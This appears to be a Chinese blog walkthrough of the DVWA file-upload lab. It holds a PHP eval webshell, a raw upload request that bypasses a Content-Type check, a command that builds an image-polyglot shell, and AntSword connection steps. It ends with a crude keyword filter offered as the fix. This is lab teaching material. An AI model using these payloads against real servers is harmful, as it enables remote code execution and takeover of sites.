当前位置: 首页 > news >正文

[dvwa] file upload

news 2025/7/29 3:17:13

file upload

0x01 low

直接上传.php
内容写<?= eval($_POST['jj']);?>
用antsword连
在这里插入图片描述
路径跳两层
在这里插入图片描述

0x02 medium

添加了两种验证,格式为图片,大小限制小于1000
上传

POST /learndvwa/vulnerabilities/upload/ HTTP/1.1
Host: dvt.dv
Content-Length: 429
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://dvt.dv
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryXl6wKhn7SrmUYYAo
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://dvt.dv/learndvwa/vulnerabilities/upload/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7
Cookie: security=medium; PHPSESSID=b94fij874mmc7v4cjgd6tci5c6
Connection: close------WebKitFormBoundaryXl6wKhn7SrmUYYAo
Content-Disposition: form-data; name="MAX_FILE_SIZE"100000
------WebKitFormBoundaryXl6wKhn7SrmUYYAo
Content-Disposition: form-data; name="uploaded"; filename="mam.php"
Content-Type: application/octet-stream<?= eval($_POST['jj']);?>
------WebKitFormBoundaryXl6wKhn7SrmUYYAo
Content-Disposition: form-data; name="Upload"Upload
------WebKitFormBoundaryXl6wKhn7SrmUYYAo--

修改content-type为image/png
即可
在这里插入图片描述

0x03 high

getimagesize(string filename) 检查文件头
$uploaded_ext = substr( $uploaded_name, strrpos($uploaded_name, ‘.’) + 1);检查后缀

在windows中使用命令合成图片马
copy 1.jpg/b + 1.php/a 2.jpg
输入命令图片在前因为需要用到图片的文件头
在这里插入图片描述
成功上传,直接antsword连接要操作一下

因为蚁剑的原理是向上传文件发送包含参数的 post 请求,通过控制参数来执行不同的命令。这里服务器将木马文件解析成了图片文件,因此向其发送 post 请求时,服务器并不会执行相应命令。

想要连马,就要让它变成php的解析形式

用文件包含将马包含到页面
在这里插入图片描述
当前路径文件被解析,尝试用antsword连马

连接失败,考虑文件过大

原来是需要加cookie,就是让dvwa确认用户登陆状态
在这里插入图片描述
https://github.com/AntSwordProject/antSword/issues/107

0x04 Repair 修复漏洞

我们不希望文件中出现后门木马,过滤敏感关键字
包括马,方括号,大括号,eval,分号,php等

$file_content = file_get_contents($_FILES['uploaded_file']['tmp_name']);$keywords = array("php", "eval", "post", "<", ">", "[", "]", "{", "}", ";");foreach ($keywords as $keyword) {if (strpos($file_content, $keyword) !== false) {echo "上传的文件包含禁止的关键字。";// 删除上传的文件或者做其他处理break;}
}
http://www.lryc.cn/news/336345.html

相关文章:

  • pygame发射子弹后绘制射线
  • 逻辑回归都有什么类型
  • 基于springboot+vue实现的高校宿舍管理系统(界面优美,十分推荐)
  • C语言学习笔记day18
  • JSP内置对象session
  • BM96 主持人调度(二)(贪心算法)
  • 【TB作品】MSP430单片机读取大气压强传感器BMP180
  • Github第一Star数的国产免费开源防火墙--雷池社区版初步体验
  • 自动驾驶涉及相关的技术
  • 简单高效的GO发票识别+发票查验接口
  • c++和python基本数据类型比较
  • 运维工具如此割裂,九招帮你统一纳管
  • 基于springboot的大创管理系统源码数据库
  • 解密辛普森悖论:如何在数据分析中保持清醒头脑
  • Vue前端框架
  • 【随笔】Git 基础篇 -- 远程仓库 git clone(二十五)
  • 在js中如果a的值是空是不是if(表达式的值是false)?
  • 数据生成 | Matlab实现基于K-means和SVM的GMM高斯混合分布的数据生成
  • HarmonyOS开发:【NFC配置流程】
  • 解决JQuery和其他库的冲突
  • 【Linux】在 Linux 上模拟网络故障
  • 腾讯云流量怎么计算的?轻量服务器流量价格表
  • 解决Maven Clean过程因内存溢出导致的“Process terminated”问题
  • 十分钟掌握在 PyTorch 中构建一个深度神经网络,基本组件、步骤和代码实现,从导入模块和定义网络结构到训练和评估网络性能。
  • BUG:vue表单验证校验不报错,必填都有信息,就是不能正常往下进行
  • MapStruct入门教程详解:轻松掌握Java Bean映射
  • Springboot 集成websocket
  • FPGA和ARM学习那个比较好
  • 你知道 Java 线程池的原理吗?
  • numpy学习笔记(1),不定期更新